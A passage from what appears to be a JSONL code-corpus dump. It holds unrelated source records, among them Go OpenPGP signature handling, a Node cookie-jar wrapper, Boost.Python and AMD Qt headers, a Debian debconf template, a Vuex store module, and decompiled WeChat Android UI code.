{\n\t\t\t\tsig.FlagCertify = true\n\t\t\t}\n\t\t\tif subpacket[0]&KeyFlagSign != 0 {\n\t\t\t\tsig.FlagSign = true\n\t\t\t}\n\t\t\tif subpacket[0]&KeyFlagEncryptCommunications != 0 {\n\t\t\t\tsig.FlagEncryptCommunications = true\n\t\t\t}\n\t\t\tif subpacket[0]&KeyFlagEncryptStorage != 0 {\n\t\t\t\tsig.FlagEncryptStorage = true\n\t\t\t}\n\t\t}\n\tcase reasonForRevocationSubpacket:\n\t\t// Reason For Revocation, section 5.2.3.23\n\t\tif !isHashed {\n\t\t\treturn\n\t\t}\n\t\tif len(subpacket) == 0 {\n\t\t\terr = errors.StructuralError(\"empty revocation reason subpacket\")\n\t\t\treturn\n\t\t}\n\t\tsig.RevocationReason = new(uint8)\n\t\t*sig.RevocationReason = subpacket[0]\n\t\tsig.RevocationReasonText = string(subpacket[1:])\n\tcase featuresSubpacket:\n\t\t// Features subpacket, section 5.2.3.24 specifies a very general\n\t\t// mechanism for OpenPGP implementations to signal support for new\n\t\t// features. In practice, the subpacket is used exclusively to\n\t\t// indicate support for MDC-protected encryption.\n\t\tsig.MDC = len(subpacket) >= 1 && subpacket[0]&1 == 1\n\tcase embeddedSignatureSubpacket:\n\t\t// Only usage is in signatures that cross-certify\n\t\t// signing subkeys. section 5.2.3.26 describes the\n\t\t// format, with its usage described in section 11.1\n\t\tif sig.EmbeddedSignature != nil {\n\t\t\terr = errors.StructuralError(\"Cannot have multiple embedded signatures\")\n\t\t\treturn\n\t\t}\n\t\tsig.EmbeddedSignature = new(Signature)\n\t\t// Embedded signatures are required to be v4 signatures see\n\t\t// section 12.1. 
However, we only parse v4 signatures in this\n\t\t// file anyway.\n\t\tif err := sig.EmbeddedSignature.parse(bytes.NewBuffer(subpacket)); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif sigType := sig.EmbeddedSignature.SigType; sigType != SigTypePrimaryKeyBinding {\n\t\t\treturn nil, errors.StructuralError(\"cross-signature has unexpected type \" + strconv.Itoa(int(sigType)))\n\t\t}\n\tcase policyURISubpacket:\n\t\t// See RFC 4880, Section 5.2.3.20\n\t\tsig.PolicyURI = string(subpacket[:])\n\tcase regularExpressionSubpacket:\n\t\tsig.Regex = string(subpacket[:])\n\t\tif isCritical {\n\t\t\tsig.StubbedOutCriticalError = errors.UnsupportedError(\"regex support is stubbed out\")\n\t\t}\n\tcase prefKeyServerSubpacket:\n\t\tsig.PreferredKeyServer = string(subpacket[:])\n\tcase issuerFingerprint:\n\t\t// The first byte is how many bytes the fingerprint is, but we'll just\n\t\t// read until the end of the subpacket, so we'll ignore it.\n\t\tsig.IssuerFingerprint = append([]byte{}, subpacket[1:]...)\n\tcase revocationKey:\n\t\t// Authorizes the specified key to issue revocation signatures\n\t\t// for a key.\n\n\t\t// TODO: Class octet must have bit 0x80 set. If the bit 0x40\n\t\t// is set, then this means that the revocation information is\n\t\t// sensitive.\n\t\tsig.DesignatedRevoker = &RevocationKey{\n\t\t\tClass: subpacket[0],\n\t\t\tPublicKeyAlgo: PublicKeyAlgorithm(subpacket[1]),\n\t\t\tFingerprint: append([]byte{}, subpacket[2:]...),\n\t\t}\n\tdefault:\n\t\tif isCritical {\n\t\t\terr = errors.UnsupportedError(\"unknown critical signature subpacket type \" + strconv.Itoa(int(packetType)))\n\t\t\treturn\n\t\t}\n\t}\n\treturn\n\nTruncated:\n\terr = errors.StructuralError(\"signature subpacket truncated\")\n\treturn\n}\n\n// subpacketLengthLength returns the length, in bytes, of an encoded length value.\nfunc subpacketLengthLength(length int) int {\n\tif length < 192 {\n\t\treturn 1\n\t}\n\tif length < 16320 {\n\t\treturn 2\n\t}\n\treturn 5\n}\n\n// serializeSubpacketLength marshals the given length into to.\nfunc serializeSubpacketLength(to []byte, length int) int {\n\t// RFC 4880, Section 4.2.2.\n\tif length < 192 {\n\t\tto[0] = byte(length)\n\t\treturn 1\n\t}\n\tif length < 16320 {\n\t\tlength -= 192\n\t\tto[0] = byte((length >> 8) + 192)\n\t\tto[1] = byte(length)\n\t\treturn 2\n\t}\n\tto[0] = 255\n\tto[1] = byte(length >> 24)\n\tto[2] = byte(length >> 16)\n\tto[3] = byte(length >> 8)\n\tto[4] = byte(length)\n\treturn 5\n}\n\n// subpacketsLength returns the serialized length, in bytes, of the given\n// subpackets.\nfunc subpacketsLength(subpackets []outputSubpacket, hashed bool) (length int) {\n\tfor _, subpacket := range subpackets {\n\t\tif subpacket.hashed == hashed {\n\t\t\tlength += subpacketLengthLength(len(subpacket.contents) + 1)\n\t\t\tlength += 1 // type byte\n\t\t\tlength += len(subpacket.contents)\n\t\t}\n\t}\n\treturn\n}\n\n// serializeSubpackets marshals the given subpackets into to.\nfunc serializeSubpackets(to []byte, subpackets []outputSubpacket, hashed bool) {\n\tfor _, subpacket := range subpackets {\n\t\tif subpacket.hashed == hashed {\n\t\t\tn := serializeSubpacketLength(to, len(subpacket.contents)+1)\n\t\t\tto[n] = byte(subpacket.subpacketType)\n\t\t\tto = to[1+n:]\n\t\t\tn = copy(to, subpacket.contents)\n\t\t\tto = to[n:]\n\t\t}\n\t}\n\treturn\n}\n\n// KeyExpired returns whether sig is a self-signature of a key that has\n// expired.\nfunc (sig *Signature) KeyExpired(currentTime time.Time) bool {\n\tif sig.KeyLifetimeSecs == nil {\n\t\treturn false\n\t}\n\texpiry := 
sig.CreationTime.Add(time.Duration(*sig.KeyLifetimeSecs) * time.Second)\n\treturn currentTime.After(expiry)\n}\n\n// ExpiresBeforeOther checks if other signature has expiration at\n// later date than sig.\nfunc (sig *Signature) ExpiresBeforeOther(other *Signature) bool {\n\tif sig.KeyLifetimeSecs == nil {\n\t\t// This sig never expires, or has infinitely long expiration\n\t\t// time.\n\t\treturn false\n\t} else if other.KeyLifetimeSecs == nil {\n\t\t// This sig expires at some non-infinite point, but the other\n\t\t// sig never expires.\n\t\treturn true\n\t}\n\n\tgetExpiryDate := func(s *Signature) time.Time {\n\t\treturn s.CreationTime.Add(time.Duration(*s.KeyLifetimeSecs) * time.Second)\n\t}\n\n\treturn getExpiryDate(other).After(getExpiryDate(sig))\n}\n\n// buildHashSuffix constructs the HashSuffix member of sig in preparation for signing.\nfunc (sig *Signature) buildHashSuffix() (err error) {\n\thashedSubpacketsLen := subpacketsLength(sig.outSubpackets, true)\n\n\tvar ok bool\n\tl := 6 + hashedSubpacketsLen\n\tsig.HashSuffix = make([]byte, l+6)\n\tsig.HashSuffix[0] = 4\n\tsig.HashSuffix[1] = uint8(sig.SigType)\n\tsig.HashSuffix[2] = uint8(sig.PubKeyAlgo)\n\tsig.HashSuffix[3], ok = s2k.HashToHashId(sig.Hash)\n\tif !ok {\n\t\tsig.HashSuffix = nil\n\t\treturn errors.InvalidArgumentError(\"hash cannot be represented in OpenPGP: \" + strconv.Itoa(int(sig.Hash)))\n\t}\n\tsig.HashSuffix[4] = byte(hashedSubpacketsLen >> 8)\n\tsig.HashSuffix[5] = byte(hashedSubpacketsLen)\n\tserializeSubpackets(sig.HashSuffix[6:l], sig.outSubpackets, true)\n\ttrailer := sig.HashSuffix[l:]\n\ttrailer[0] = 4\n\ttrailer[1] = 0xff\n\ttrailer[2] = byte(l >> 24)\n\ttrailer[3] = byte(l >> 16)\n\ttrailer[4] = byte(l >> 8)\n\ttrailer[5] = byte(l)\n\treturn\n}\n\nfunc (sig *Signature) signPrepareHash(h hash.Hash) (digest []byte, err error) {\n\terr = sig.buildHashSuffix()\n\tif err != nil {\n\t\treturn\n\t}\n\n\th.Write(sig.HashSuffix)\n\tdigest = h.Sum(nil)\n\tcopy(sig.HashTag[:], digest)\n\treturn\n}\n\n// Sign signs a message with a private key. The hash, h, must contain\n// the hash of the message to be signed and will be mutated by this function.\n// On success, the signature is stored in sig. 
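A minimal usage sketch (illustrative only: the message bytes, the already-decrypted *PrivateKey named priv, and the SHA-256 hash choice are assumptions, not requirements of this API):\n//\n//\tsig := &Signature{\n//\t\tSigType:      SigTypeBinary,\n//\t\tPubKeyAlgo:   priv.PubKeyAlgo,\n//\t\tHash:         crypto.SHA256,\n//\t\tCreationTime: time.Now(),\n//\t}\n//\th := sha256.New()\n//\th.Write(message)\n//\tif err := sig.Sign(h, priv, nil); err != nil {\n//\t\t// handle the error\n//\t}\n//\n// 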
Call Serialize to write it out.\n// If config is nil, sensible defaults will be used.\nfunc (sig *Signature) Sign(h hash.Hash, priv *PrivateKey, config *Config) (err error) {\n\tsigner, hashIsSigner := h.(Signer)\n\n\tif !hashIsSigner && (priv == nil || priv.PrivateKey == nil) {\n\t\terr = errors.InvalidArgumentError(\"attempting to sign with nil PrivateKey\")\n\t\treturn\n\t}\n\n\tsig.outSubpackets = sig.buildSubpackets()\n\tdigest, err := sig.signPrepareHash(h)\n\tif err != nil {\n\t\treturn\n\t}\n\n\tif hashIsSigner {\n\t\terr = signer.Sign(sig)\n\t\treturn\n\t}\n\n\t// Parameter check, if this is wrong we will make a signature but\n\t// not serialize it later.\n\tif sig.PubKeyAlgo != priv.PubKeyAlgo {\n\t\terr = errors.InvalidArgumentError(\"signature pub key algo does not match priv key\")\n\t\treturn\n\t}\n\n\tswitch priv.PubKeyAlgo {\n\tcase PubKeyAlgoRSA, PubKeyAlgoRSASignOnly:\n\t\tsig.RSASignature.bytes, err = rsa.SignPKCS1v15(config.Random(), priv.PrivateKey.(*rsa.PrivateKey), sig.Hash, digest)\n\t\tsig.RSASignature.bitLength = uint16(8 * len(sig.RSASignature.bytes))\n\tcase PubKeyAlgoDSA:\n\t\tdsaPriv := priv.PrivateKey.(*dsa.PrivateKey)\n\n\t\t// Need to truncate hashBytes to match FIPS 186-3 section 4.6.\n\t\tsubgroupSize := (dsaPriv.Q.BitLen() + 7) / 8\n\t\tif len(digest) > subgroupSize {\n\t\t\tdigest = digest[:subgroupSize]\n\t\t}\n\t\tr, s, err := dsa.Sign(config.Random(), dsaPriv, digest)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tsig.DSASigR.bytes = r.Bytes()\n\t\tsig.DSASigR.bitLength = uint16(8 * len(sig.DSASigR.bytes))\n\t\tsig.DSASigS.bytes = s.Bytes()\n\t\tsig.DSASigS.bitLength = uint16(8 * len(sig.DSASigS.bytes))\n\tcase PubKeyAlgoECDSA:\n\t\tr, s, err := ecdsa.Sign(config.Random(), priv.PrivateKey.(*ecdsa.PrivateKey), digest)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tsig.ECDSASigR = FromBig(r)\n\t\tsig.ECDSASigS = FromBig(s)\n\tcase PubKeyAlgoEdDSA:\n\t\tr, s, err := priv.PrivateKey.(*EdDSAPrivateKey).Sign(digest)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tsig.EdDSASigR = FromBytes(r)\n\t\tsig.EdDSASigS = FromBytes(s)\n\tdefault:\n\t\terr = errors.UnsupportedError(\"public key algorithm for signing: \" + strconv.Itoa(int(priv.PubKeyAlgo)))\n\t}\n\n\treturn\n}\n\n// SignUserId computes a signature from priv, asserting that pub is a valid\n// key for the identity id. On success, the signature is stored in sig. Call\n// Serialize to write it out.\n// If config is nil, sensible defaults will be used.\nfunc (sig *Signature) SignUserId(id string, pub *PublicKey, priv *PrivateKey, config *Config) error {\n\th, err := userIdSignatureHash(id, pub, sig.Hash)\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn sig.Sign(h, priv, config)\n}\n\n// SignUserIdWithSigner computes a signature from priv, asserting that pub is a\n// valid key for the identity id. On success, the signature is stored in sig.\n// Call Serialize to write it out.\n// If config is nil, sensible defaults will be used.\nfunc (sig *Signature) SignUserIdWithSigner(id string, pub *PublicKey, s Signer, config *Config) error {\n\tupdateUserIdSignatureHash(id, pub, s)\n\n\treturn sig.Sign(s, nil, config)\n}\n\n// SignKey computes a signature from priv, asserting that pub is a subkey. On\n// success, the signature is stored in sig. 
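A similar sketch for a subkey binding (subPub, the subkey's *PublicKey, and primaryPriv, the primary *PrivateKey, are illustrative names):\n//\n//\tbindSig := &Signature{\n//\t\tSigType:      SigTypeSubkeyBinding,\n//\t\tPubKeyAlgo:   primaryPriv.PubKeyAlgo,\n//\t\tHash:         crypto.SHA256,\n//\t\tCreationTime: time.Now(),\n//\t}\n//\tif err := bindSig.SignKey(subPub, primaryPriv, nil); err != nil {\n//\t\t// handle the error\n//\t}\n//\n// 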
Call Serialize to write it out.\n// If config is nil, sensible defaults will be used.\nfunc (sig *Signature) SignKey(pub *PublicKey, priv *PrivateKey, config *Config) error {\n\th, err := keySignatureHash(&priv.PublicKey, pub, sig.Hash)\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn sig.Sign(h, priv, config)\n}\n\n// SignKeyWithSigner computes a signature using s, asserting that\n// signeePubKey is a subkey. On success, the signature is stored in sig. Call\n// Serialize to write it out. If config is nil, sensible defaults will be used.\nfunc (sig *Signature) SignKeyWithSigner(signeePubKey *PublicKey, signerPubKey *PublicKey, s Signer, config *Config) error {\n\tupdateKeySignatureHash(signerPubKey, signeePubKey, s)\n\n\treturn sig.Sign(s, nil, config)\n}\n\n// CrossSignKey creates PrimaryKeyBinding signature in sig.EmbeddedSignature by\n// signing `primary` key's hash using `priv` subkey private key. Primary public\n// key is the `signee` here.\nfunc (sig *Signature) CrossSignKey(primary *PublicKey, priv *PrivateKey, config *Config) error {\n\tif len(sig.outSubpackets) > 0 {\n\t\treturn fmt.Errorf(\"outSubpackets already exists, looks like CrossSignKey was called after Sign\")\n\t}\n\n\tsig.EmbeddedSignature = &Signature{\n\t\tCreationTime: sig.CreationTime,\n\t\tSigType: SigTypePrimaryKeyBinding,\n\t\tPubKeyAlgo: priv.PubKeyAlgo,\n\t\tHash: sig.Hash,\n\t}\n\n\th, err := keySignatureHash(primary, &priv.PublicKey, sig.Hash)\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn sig.EmbeddedSignature.Sign(h, priv, config)\n}\n\n// Serialize marshals sig to w. Sign, SignUserId or SignKey must have been\n// called first.\nfunc (sig *Signature) Serialize(w io.Writer) (err error) {\n\tif len(sig.outSubpackets) == 0 {\n\t\tsig.outSubpackets = sig.rawSubpackets\n\t}\n\tif sig.RSASignature.bytes == nil &&\n\t\tsig.DSASigR.bytes == nil &&\n\t\tsig.ECDSASigR.bytes == nil &&\n\t\tsig.EdDSASigR.bytes == nil {\n\t\treturn errors.InvalidArgumentError(\"Signature: need to call Sign, SignUserId or SignKey before Serialize\")\n\t}\n\n\tsigLength := 0\n\tswitch sig.PubKeyAlgo {\n\tcase PubKeyAlgoRSA, PubKeyAlgoRSASignOnly:\n\t\tsigLength = 2 + len(sig.RSASignature.bytes)\n\tcase PubKeyAlgoDSA:\n\t\tsigLength = 2 + len(sig.DSASigR.bytes)\n\t\tsigLength += 2 + len(sig.DSASigS.bytes)\n\tcase PubKeyAlgoEdDSA:\n\t\tsigLength = 2 + len(sig.EdDSASigR.bytes)\n\t\tsigLength += 2 + len(sig.EdDSASigS.bytes)\n\tcase PubKeyAlgoECDSA:\n\t\tsigLength = 2 + len(sig.ECDSASigR.bytes)\n\t\tsigLength += 2 + len(sig.ECDSASigS.bytes)\n\tdefault:\n\t\tpanic(\"impossible\")\n\t}\n\n\tunhashedSubpacketsLen := subpacketsLength(sig.outSubpackets, false)\n\tlength := len(sig.HashSuffix) - 6 /* trailer not included */ +\n\t\t2 /* length of unhashed subpackets */ + unhashedSubpacketsLen +\n\t\t2 /* hash tag */ + sigLength\n\terr = serializeHeader(w, packetTypeSignature, length)\n\tif err != nil {\n\t\treturn\n\t}\n\n\t_, err = w.Write(sig.HashSuffix[:len(sig.HashSuffix)-6])\n\tif err != nil {\n\t\treturn\n\t}\n\n\tunhashedSubpackets := make([]byte, 2+unhashedSubpacketsLen)\n\tunhashedSubpackets[0] = byte(unhashedSubpacketsLen >> 8)\n\tunhashedSubpackets[1] = byte(unhashedSubpacketsLen)\n\tserializeSubpackets(unhashedSubpackets[2:], sig.outSubpackets, false)\n\n\t_, err = w.Write(unhashedSubpackets)\n\tif err != nil {\n\t\treturn\n\t}\n\t_, err = w.Write(sig.HashTag[:])\n\tif err != nil {\n\t\treturn\n\t}\n\n\tswitch sig.PubKeyAlgo {\n\tcase PubKeyAlgoRSA, PubKeyAlgoRSASignOnly:\n\t\terr = writeMPIs(w, sig.RSASignature)\n\tcase 
PubKeyAlgoDSA:\n\t\terr = writeMPIs(w, sig.DSASigR, sig.DSASigS)\n\tcase PubKeyAlgoEdDSA:\n\t\terr = writeMPIs(w, sig.EdDSASigR, sig.EdDSASigS)\n\tcase PubKeyAlgoECDSA:\n\t\terr = writeMPIs(w, sig.ECDSASigR, sig.ECDSASigS)\n\tdefault:\n\t\tpanic(\"impossible\")\n\t}\n\treturn\n}\n\n// outputSubpacket represents a subpacket to be marshaled.\ntype outputSubpacket struct {\n\thashed bool // true if this subpacket is in the hashed area.\n\tsubpacketType signatureSubpacketType\n\tisCritical bool\n\tcontents []byte\n}\n\nfunc (sig *Signature) buildSubpackets() (subpackets []outputSubpacket) {\n\tcreationTime := make([]byte, 4)\n\tbinary.BigEndian.PutUint32(creationTime, uint32(sig.CreationTime.Unix()))\n\tsubpackets = append(subpackets, outputSubpacket{true, creationTimeSubpacket, false, creationTime})\n\n\tif sig.IssuerKeyId != nil {\n\t\tkeyId := make([]byte, 8)\n\t\tbinary.BigEndian.PutUint64(keyId, *sig.IssuerKeyId)\n\t\tsubpackets = append(subpackets, outputSubpacket{true, issuerSubpacket, false, keyId})\n\t}\n\n\tif sig.SigLifetimeSecs != nil && *sig.SigLifetimeSecs != 0 {\n\t\tsigLifetime := make([]byte, 4)\n\t\tbinary.BigEndian.PutUint32(sigLifetime, *sig.SigLifetimeSecs)\n\t\tsubpackets = append(subpackets, outputSubpacket{true, signatureExpirationSubpacket, true, sigLifetime})\n\t}\n\n\t// Key flags may only appear in self-signatures or certification signatures.\n\n\tif sig.FlagsValid {\n\t\tsubpackets = append(subpackets, outputSubpacket{true, keyFlagsSubpacket, false, []byte{sig.GetKeyFlags().BitField}})\n\t}\n\n\t// The following subpackets may only appear in self-signatures\n\n\tif sig.KeyLifetimeSecs != nil && *sig.KeyLifetimeSecs != 0 {\n\t\tkeyLifetime := make([]byte, 4)\n\t\tbinary.BigEndian.PutUint32(keyLifetime, *sig.KeyLifetimeSecs)\n\t\tsubpackets = append(subpackets, outputSubpacket{true, keyExpirationSubpacket, true, keyLifetime})\n\t}\n\n\tif sig.IsPrimaryId != nil && *sig.IsPrimaryId {\n\t\tsubpackets = append(subpackets, outputSubpacket{true, primaryUserIdSubpacket, false, []byte{1}})\n\t}\n\n\tif len(sig.PreferredSymmetric) > 0 {\n\t\tsubpackets = append(subpackets, outputSubpacket{true, prefSymmetricAlgosSubpacket, false, sig.PreferredSymmetric})\n\t}\n\n\tif len(sig.PreferredHash) > 0 {\n\t\tsubpackets = append(subpackets, outputSubpacket{true, prefHashAlgosSubpacket, false, sig.PreferredHash})\n\t}\n\n\tif len(sig.PreferredCompression) > 0 {\n\t\tsubpackets = append(subpackets, outputSubpacket{true, prefCompressionSubpacket, false, sig.PreferredCompression})\n\t}\n\n\tif sig.EmbeddedSignature != nil {\n\t\tbuf := bytes.NewBuffer(nil)\n\t\tif err := sig.EmbeddedSignature.Serialize(buf); err == nil {\n\t\t\tbyteContent := buf.Bytes()[2:] // skip 2-byte length header\n\t\t\tsubpackets = append(subpackets, outputSubpacket{false, embeddedSignatureSubpacket, true, byteContent})\n\t\t}\n\t}\n\n\treturn\n}\n\nfunc (sig *Signature) GetKeyFlags() (ret KeyFlagBits) {\n\tif !sig.FlagsValid {\n\t\treturn ret\n\t}\n\n\tret.Valid = true\n\tif sig.FlagCertify {\n\t\tret.BitField |= KeyFlagCertify\n\t}\n\tif sig.FlagSign {\n\t\tret.BitField |= KeyFlagSign\n\t}\n\tif sig.FlagEncryptCommunications {\n\t\tret.BitField |= KeyFlagEncryptCommunications\n\t}\n\tif sig.FlagEncryptStorage {\n\t\tret.BitField |= KeyFlagEncryptStorage\n\t}\n\treturn ret\n}\n\nfunc (f *KeyFlagBits) HasFlagCertify() bool {\n\treturn f.BitField&KeyFlagCertify != 0\n}\n\nfunc (f *KeyFlagBits) HasFlagSign() bool {\n\treturn f.BitField&KeyFlagSign != 0\n}\n\nfunc (f *KeyFlagBits) HasFlagEncryptCommunications() bool 
{\n\treturn f.BitField&KeyFlagEncryptCommunications != 0\n}\n\nfunc (f *KeyFlagBits) HasFlagEncryptStorage() bool {\n\treturn f.BitField&KeyFlagEncryptStorage != 0\n}\n\nfunc (f *KeyFlagBits) Merge(other KeyFlagBits) {\n\tif other.Valid {\n\t\tf.Valid = true\n\t\tf.BitField |= other.BitField\n\t}\n}\n"} {"text": "'use strict'\n\nvar tough = require('tough-cookie')\n\nvar Cookie = tough.Cookie\n , CookieJar = tough.CookieJar\n\n\nexports.parse = function(str) {\n if (str && str.uri) {\n str = str.uri\n }\n if (typeof str !== 'string') {\n throw new Error('The cookie function only accepts STRING as param')\n }\n return Cookie.parse(str, {loose: true})\n}\n\n// Adapt the sometimes-Async api of tough.CookieJar to our requirements\nfunction RequestJar(store) {\n var self = this\n self._jar = new CookieJar(store, {looseMode: true})\n}\nRequestJar.prototype.setCookie = function(cookieOrStr, uri, options) {\n var self = this\n return self._jar.setCookieSync(cookieOrStr, uri, options || {})\n}\nRequestJar.prototype.getCookieString = function(uri) {\n var self = this\n return self._jar.getCookieStringSync(uri)\n}\nRequestJar.prototype.getCookies = function(uri) {\n var self = this\n return self._jar.getCookiesSync(uri)\n}\n\nexports.jar = function(store) {\n return new RequestJar(store)\n}\n"} {"text": "#ifndef BOOST_PP_IS_ITERATING\n// Copyright David Abrahams 2002.\n// Distributed under the Boost Software License, Version 1.0. (See\n// accompanying file LICENSE_1_0.txt or copy at\n// http://www.boost.org/LICENSE_1_0.txt)\n# ifndef TYPE_LIST_IMPL_DWA2002913_HPP\n# define TYPE_LIST_IMPL_DWA2002913_HPP\n\n# include \n\n# include \n# include \n# include \n# include \n# include \n# include \n# include \n\nnamespace boost { namespace python { namespace detail { \n\ntemplate \nstruct type_list\n : BOOST_PP_CAT(mpl::vector,BOOST_PYTHON_LIST_SIZE)\n{\n};\n\n# define BOOST_PP_ITERATION_PARAMS_1 \\\n (3, (0, BOOST_PP_DEC(BOOST_PYTHON_LIST_SIZE), ))\n# include BOOST_PP_ITERATE()\n\n\n}}} // namespace boost::python::detail\n\n# endif // TYPE_LIST_IMPL_DWA2002913_HPP\n\n#else // BOOST_PP_IS_ITERATING\n\n# define N BOOST_PP_ITERATION()\n# define BOOST_PYTHON_VOID_ARGS BOOST_PP_SUB_D(1,BOOST_PYTHON_LIST_SIZE,N)\n\ntemplate <\n BOOST_PP_ENUM_PARAMS_Z(1, N, class T)\n >\nstruct type_list<\n BOOST_PP_ENUM_PARAMS_Z(1, N, T)\n BOOST_PP_COMMA_IF(N)\n BOOST_PP_ENUM(\n BOOST_PYTHON_VOID_ARGS, BOOST_PYTHON_FIXED, mpl::void_)\n >\n : BOOST_PP_CAT(mpl::vector,N)\n{\n};\n\n# undef BOOST_PYTHON_VOID_ARGS\n# undef N\n\n#endif // BOOST_PP_IS_ITERATING \n"} {"text": "Template: lcl-utils${PACKAGESUFFIX}/rename_cfg\nType: boolean\nDefault: true\n_Description: Rename \"/etc/lazarus\" to \"/etc/lazarus.bak\"?\n The Lazarus suite now supports keeping multiple versions installed\n at the same time and using the alternatives system to set proper\n defaults. Normally, the latest version of any component is used.\n .\n To use the alternatives system on the system-wide configuration\n of the Lazarus suite, /etc/lazarus needs to be under control of the\n alternatives system. Currently there is a real directory at\n /etc/lazarus, probably from a previous installation. In order to\n start using the alternatives system on the configuration you must\n accept renaming \"/etc/lazarus\". If you don't, you will need to\n review the configuration on every version update of Lazarus as,\n unfortunately, the configuration files are not always\n backward-compatible. 
Also switching between different versions\n might need more intervention.\n .\n If you have made changes to your configuration files, you will\n probably need to review them and apply them to all versioned\n configurations, as they will not automatically propagate.\n"} {"text": "import { Module } from 'vuex'\nimport Vue from 'Vue'\nimport { State as RootState } from '../..'\n\nimport { propLens, over, set } from '../../../shims/vuex-lens'\nconst imagesLen = propLens('images')\n\nexport class State {\n images: any[] = []\n all = 1\n page = 1\n}\n\nconst Index: Module = {\n namespaced: true,\n state: new State(),\n mutations: {\n PUSH_IMAGES: (state, payload) => {\n over(imagesLen, (images: any) => R.concat(images, payload), state)\n },\n SET_IMAGES: (state, payload) => {\n set(imagesLen, payload, state)\n },\n ALL_PAGE: (state, payload) => {\n state.all = parseInt(payload)\n },\n PAGE: (state, payload) => {\n state.page = parseInt(payload)\n }\n },\n actions: {\n setImages({ commit }, images) {\n commit('SET_IMAGES', images.data)\n commit('ALL_PAGE', images.allPage)\n commit('PAGE', images.currentPage)\n },\n pushImages({ commit }, images) {\n commit('PUSH_IMAGES', images.data)\n commit('ALL_PAGE', images.allPage)\n commit('PAGE', images.currentPage)\n }\n }\n}\n\nexport default Index\n"} {"text": "//==================================================================================\n// Copyright (c) 2016 , Advanced Micro Devices, Inc. All rights reserved.\n//\n/// \\author AMD Developer Tools Team\n/// \\file afLineEdit.h\n///\n//==================================================================================\n\n#ifndef __AFLINEEDIT_H\n#define __AFLINEEDIT_H\n\n// Qt\n#include \n\n\n// Local:\n#include \n\n\n// ----------------------------------------------------------------------------------\n// Class Name: afLineEdit\n// General Description: This class inherits QLineEdit. Use this class when a user edit\n// completion is required. 
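A construction sketch (the object name and parent pointer below are illustrative only):\n//                      afLineEdit* pFindEdit = new afLineEdit(\"myViewFindLineEdit\", pParentWidget);\n//                      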
Make sure to store a unique object name.\n// This object name is used to store the edit history in the framework.\n// ----------------------------------------------------------------------------------\nclass AF_API afLineEdit : public QLineEdit\n{\n Q_OBJECT\n\npublic:\n\n /// Constructor:\n afLineEdit(const QString& objectName, QWidget* pParent = nullptr);\n afLineEdit(const QString& objectName, const QString& contents, QWidget* pParent = nullptr);\n\n /// Destructor:\n ~afLineEdit();\n\nprotected slots:\n\n /// Is handling the editing finished signal:\n void OnEditFinished();\n\nprivate:\n\n /// Initializes the line edit completer:\n void InitilaizeCompleter();\n\n\n};\n\n#endif //__AFLINEEDIT_H\n\n"} {"text": "package com.tencent.mm.plugin.sns.storage.AdLandingPagesStorage.AdLandingPageComponent.component;\n\nimport android.content.Context;\nimport android.view.View;\nimport android.view.ViewGroup;\nimport android.view.ViewGroup.LayoutParams;\nimport android.view.ViewGroup.MarginLayoutParams;\nimport android.widget.ScrollView;\nimport com.tencent.matrix.trace.core.AppMethodBeat;\nimport com.tencent.mm.plugin.sns.storage.AdLandingPagesStorage.AdLandingPageComponent.component.widget.a;\nimport com.tencent.mm.plugin.sns.storage.AdLandingPagesStorage.AdLandingPageComponent.p;\nimport com.tencent.mm.plugin.sns.storage.AdLandingPagesStorage.AdLandingPageComponent.r;\nimport com.tencent.mm.plugin.sns.storage.AdLandingPagesStorage.l;\nimport com.tencent.mm.ui.base.CustomScrollView;\nimport com.tencent.mm.ui.widget.RoundedCornerRelativeLayout;\nimport java.util.ArrayList;\nimport java.util.List;\n\npublic final class n extends a {\n List bnR = new ArrayList();\n private l qZg;\n private p ral;\n private CustomScrollView ram;\n\n public n(Context context, p pVar, ViewGroup viewGroup) {\n super(context, pVar, viewGroup);\n AppMethodBeat.i(37153);\n this.ral = pVar;\n AppMethodBeat.o(37153);\n }\n\n /* Access modifiers changed, original: protected|final */\n public final void cpp() {\n AppMethodBeat.i(37154);\n if (this.qZg == null) {\n this.qZg = new l(this.ral.bnR, this.context, this.ram);\n this.qZg.aZ();\n this.bnR = cpt();\n } else {\n this.qZg.dl(this.ral.bnR);\n }\n if (getGravity() == 0) {\n LayoutParams layoutParams = this.contentView.getLayoutParams();\n if (layoutParams instanceof MarginLayoutParams) {\n ((MarginLayoutParams) layoutParams).setMargins((int) this.qZo.qWS, (int) this.qZo.qWQ, (int) this.qZo.qWT, (int) this.qZo.qWR);\n }\n this.contentView.setLayoutParams(layoutParams);\n }\n AppMethodBeat.o(37154);\n }\n\n /* Access modifiers changed, original: protected|final */\n public final View cpr() {\n AppMethodBeat.i(37155);\n RoundedCornerRelativeLayout roundedCornerRelativeLayout = new RoundedCornerRelativeLayout(this.context);\n this.ram = new CustomScrollView(this.context);\n this.ram.setOverScrollMode(2);\n this.ram.setHorizontalScrollBarEnabled(false);\n this.ram.setVerticalScrollBarEnabled(false);\n this.ram.setOnScrollChangeListener(new CustomScrollView.a() {\n public final void a(ScrollView scrollView, int i, int i2) {\n AppMethodBeat.i(37152);\n for (h hVar : n.this.bnR) {\n if (hVar.cpx()) {\n hVar.cpa();\n hVar.cpc();\n } else {\n hVar.cpb();\n }\n }\n AppMethodBeat.o(37152);\n }\n });\n roundedCornerRelativeLayout.setBackgroundColor(this.backgroundColor);\n roundedCornerRelativeLayout.addView(this.ram);\n roundedCornerRelativeLayout.setRadius((float) this.ral.qWN);\n AppMethodBeat.o(37155);\n return roundedCornerRelativeLayout;\n }\n\n public final void cpa() {\n 
